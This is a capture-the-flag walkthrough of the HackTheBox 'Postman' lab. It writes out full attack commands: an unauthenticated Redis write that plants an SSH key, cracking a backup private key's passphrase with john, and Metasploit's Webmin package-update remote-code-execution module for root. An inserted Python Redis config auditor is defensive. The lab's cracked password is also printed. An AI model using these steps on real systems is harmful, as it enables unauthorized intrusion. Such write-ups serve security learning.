HackTheBox - Postman | Walkthrough
Postman is a box rated Easy on HackTheBox. It just retired, so here's my writeup!
First, let's add the hostname postman to the hosts file so that we don't always need to type in the IP address.
vi /etc/hosts
Hit i (to enter insert mode)
10.10.10.160 postman
[esc]
:x (save and exit)
Now, let's run an nmap scan to see what services are running. We will be checking all ports, hence the -p- option.
nmap -A -T4 -p- 10.10.10.160
SSL - 21
http - 80
Miniserv 1.910 - 10000
redis - 6379
Miniserv on port 10000 is something I haven't seen very often. Let's check if it has a webpage.
We see a Webmin login prompt. Trying admin/admin there doesn't get us anything, and I don't think brute force is the name of the game here.
Now, the other interesting service is redis. To check the redis port:
apt-get install redis-tools #installing redis command line tools
redis-cli -h postman #connecting to the postman server via redis-cli
ping #checking the connection
pong #we get a pong back, that's nice
Now that we know the connection works fine, let's quit.
This version of redis has a common vulnerability. You can check it out at: https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html
As suggested by Packet Storm Security, let's try generating an RSA key and see if that works.
ssh-keygen -t rsa -C "redis@postman"
Create the private/public key pair and save them both at ~/HTB/Postman.
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt
Now, let's upload the contents of the test.txt file to the redis server.
cat test.txt | redis-cli -h 10.10.10.160 -x set crackit
The -x option tells redis-cli to read the last argument from STDIN, which in our case is the content of test.txt.
redis-cli -h 10.10.10.160
config get dir
config set dbfilename "authorized_keys"
save
quit
We saved the contents of our test.txt file as authorized_keys on the server.
Now, let's try to log in with the key pair.
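The steps above only work because this Redis instance accepts CONFIG SET and SAVE from an unauthenticated client that can reach the port. As an added example (not part of the original writeup), this script audits a redis.conf for exactly those conditions and shows a hardened config passing the same checks; both config texts are constructed samples and the requirepass value is a placeholder.

```python
# Added example, not from the original writeup. Audits a redis.conf for the
# settings that let an unauthenticated client CONFIG SET dir/dbfilename and
# SAVE an authorized_keys file. Both configs are constructed; password is a placeholder.

WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
# requirepass is left commented out
"""

HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
requirepass REPLACE_WITH_LONG_RANDOM_SECRET
rename-command CONFIG ""
rename-command SAVE ""
rename-command BGSAVE ""
rename-command DEBUG ""
"""

def parse_conf(text):
    """Map each directive to the list of argument lists it appears with."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # comments and blank lines carry no settings
        name, *args = line.split()
        conf.setdefault(name.lower(), []).append(args)
    return conf

def audit(text):
    """Return a list of findings; an empty list means every check passed."""
    conf = parse_conf(text)
    findings = []
    if "requirepass" not in conf:
        findings.append("no requirepass: any client reaching the port is fully trusted")
    binds = [a for args in conf.get("bind", []) for a in args]
    if not binds or any(b in ("0.0.0.0", "::", "*") for b in binds):
        findings.append("bind exposes Redis on non-loopback interfaces")
    mode = conf.get("protected-mode", [["yes"]])[-1]
    if mode and mode[0].lower() == "no":
        findings.append("protected-mode no: unauthenticated remote clients not rejected")
    renamed = {args[0].lower() for args in conf.get("rename-command", []) if args}
    for cmd in ("config", "save", "bgsave", "debug"):
        if cmd not in renamed:
            findings.append(f"{cmd.upper()} command not renamed or disabled")
    return findings
```

Run audit() over your own /etc/redis/redis.conf; with requirepass set, bind restricted to loopback and CONFIG renamed, the dbfilename trick on this page is no longer available to an anonymous client.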
ssh -i id_rsa redis@10.10.10.160
You are in!
Got the initial foothold, now time for privesc!
cd /opt/
ls
When you ls there, you should see an id_rsa.bak file.
That's interesting; we should check whether it really is a backup of an id_rsa file, in which case our job will be really easy.
cat id_rsa.bak
Copy all of it and, in another terminal window on our attacking machine, run
vi ~/HTB/Postman/id_rsa.bak
Again, hit i to go into insert mode and paste everything there.
[esc]
:x to save and exit.
Now, we will try to crack the passphrase protecting the RSA key.
updatedb
locate ssh2john.py #finds where ssh2john.py file is
cp $(locate ssh2john.py) . #copies the ssh2john.py file from wherever it is to the present working directory
python ssh2john.py id_rsa.bak > id_rsa.bak.hash #converts it to a john usable format
john id_rsa.bak.hash -wordlist=rockyou.txt #using the rockyou.txt file and john, we try to crack the password
You should get a password, "computer2008".
However, when you try to ssh in with it, you will be denied.
Now, go back to the window where you are logged in as redis user.
su Matt
Enter computer2008 as the password.
Boom!
You are user now!
cd ~
cat user.txt
Now, go to the browser and try to log in to Webmin using Matt's credentials (notice that it is Matt, not matt).
So, that works.
Now, log out as Matt from both the terminal and Webmin.
Back on your Kali machine,
msfconsole
search webmin
use linux/http/webmin_packageup_rce
options
set rhosts postman
set password computer2008
set username Matt
set ssl true
set lhost <your kali machine's ip>
exploit
And that should work!
Congratulations, you're root now!
cat /root/root.txt
Thank you for reading, feel free to share it if you like it!
- root@abhizer